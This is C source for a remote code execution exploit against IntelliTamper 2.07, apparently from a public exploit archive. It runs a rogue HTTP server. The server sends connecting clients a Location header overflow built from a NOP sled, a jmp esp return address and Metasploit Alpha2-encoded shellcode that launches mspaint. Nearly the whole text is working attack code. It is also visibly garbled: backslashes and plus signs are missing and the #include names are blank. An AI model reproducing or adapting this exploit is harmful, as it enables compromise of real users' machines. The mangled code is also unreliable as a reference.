IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

**

** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.

**

** Based on exploit by Koshi (written in Perl). This one should be more

** stable. Just for fun and to learn more about win32 exploitation.

**

** by Wojciech Pawlikowski (wojtekp@gmail.com)

**/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define BUFSIZE 1550

#define NOP 0x90

#define RETADDR 0x7c941EED // jmp esp ntdll.dll

/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */

unsigned char shellcode[] =

"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"

"x49x48x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42"

"x58x30x42x31x50x41x42x6bx41x41x52x41x32x41x41x32"

"x42x41x30x42x41x58x50x38x41x42x75x6dx39x59x6cx69"

"x78x41x54x75x50x77x70x45x50x6cx4bx73x75x55x6cx4e"

"x6bx61x6cx33x35x54x38x55x51x7ax4fx4cx4bx70x4fx45"

"x48x4cx4bx33x6fx67x50x45x51x4ax4bx43x79x6cx4bx34"

"x74x4cx4bx47x71x6ax4ex64x71x6fx30x5ax39x6ex4cx4e"

"x64x4fx30x30x74x45x57x79x51x6bx7ax74x4dx37x71x5a"

"x62x4ax4bx5ax54x55x6bx31x44x71x34x55x54x71x65x4b"

"x55x6cx4bx73x6fx61x34x45x51x78x6bx65x36x6cx4bx36"

"x6cx50x4bx4ex6bx71x4fx57x6cx35x51x38x6bx4cx4bx77"

"x6cx6ex6bx77x71x6ax4bx4cx49x71x4cx37x54x34x44x7a"

"x63x54x71x39x50x61x74x6cx4bx43x70x46x50x4bx35x49"

"x50x72x58x46x6cx6cx4bx47x30x36x6cx6cx4bx70x70x37"

"x6cx4ex4dx4cx4bx65x38x46x68x7ax4bx64x49x4ex6bx4f"

"x70x6ex50x77x70x77x70x45x50x6cx4bx70x68x37x4cx63"

"x6fx64x71x49x66x73x50x31x46x6ex69x59x68x4bx33x69"

"x50x51x6bx30x50x32x48x5ax4fx5ax6ex69x70x45x30x33"

"x58x4cx58x6bx4ex4cx4ax76x6ex66x37x6bx4fx7ax47x30"

"x6dx53x43x62x50x53x51x73x59x32x4ex33x44x45x50x42";

int

main(void)

{

struct sockaddr_in serv_sin, cli_sin;

int i, sockfd, cli_sock, sock_opt = 1, sin_len;

char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };

sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (sockfd < 0)

{

perror("socket()");

exit(-1);

}

serv_sin.sin_family = AF_INET;

serv_sin.sin_port = htons(80);

serv_sin.sin_addr.s_addr = INADDR_ANY;

if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)

{

perror("setsockopt()");

close(sockfd);

exit(-1);

}

if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)

{

perror("bind()");

close(sockfd);

exit(-1);

}

listen(sockfd, 1);

sin_len = sizeof(struct sockaddr);

printf("[*] Waiting for a connection...n");

while (1)

{

cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);

if (cli_sock < 0)

{

perror("accept()");

exit(-1);

}

printf("[ ] Connection from %s:%dn", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));

read(cli_sock, buf, sizeof(buf) - 1);

overflow = (char *)malloc(BUFSIZE 1);

for (i = 0; i <= 1540; i = 4)

*(long *)&overflow[i] = RETADDR;

for (i = 0; i < 1536; i )

overflow[i] = NOP;

memcpy(overflow 550, shellcode, strlen(shellcode));

memcpy(overflow i 4, "xe9x14xfcxffxff", 5); // jmp -1000 - jump to our buffer

i = sprintf(req, "200 HTTP/1.1rnDate: 2008-07-24 20:14:31rnLocation: ");

memcpy(req i, overflow, strlen(overflow));

memcpy(req i strlen(overflow), "rnrn", 4);

write(cli_sock, req, strlen(req));

printf("[ ] Exploit sent!n");

close(cli_sock);

}

close(sockfd);

}